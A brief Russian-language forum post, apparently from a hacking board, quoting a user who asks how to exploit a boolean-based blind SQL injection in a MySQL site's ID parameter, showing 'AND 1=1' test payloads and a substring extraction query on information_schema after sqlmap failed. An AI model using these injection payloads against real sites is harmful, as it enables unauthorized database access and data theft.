27.12.2014, 03:29
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от vikler
Код:
...php?ID=12234+AND+1=1
-> истинный вывод
Код:
...php?ID=12234+AND+1=2
-> неверный вывод
В общем, boolean based, mysql. Как раскручивать? Обычно я sqlmap'ом слепые раскручиваю, но тут типа [CRITICAL] unable to retrieve the database names and(subsrt((select table_name from information_schema.tables limit 1,1),1,1))='c'
|
|
|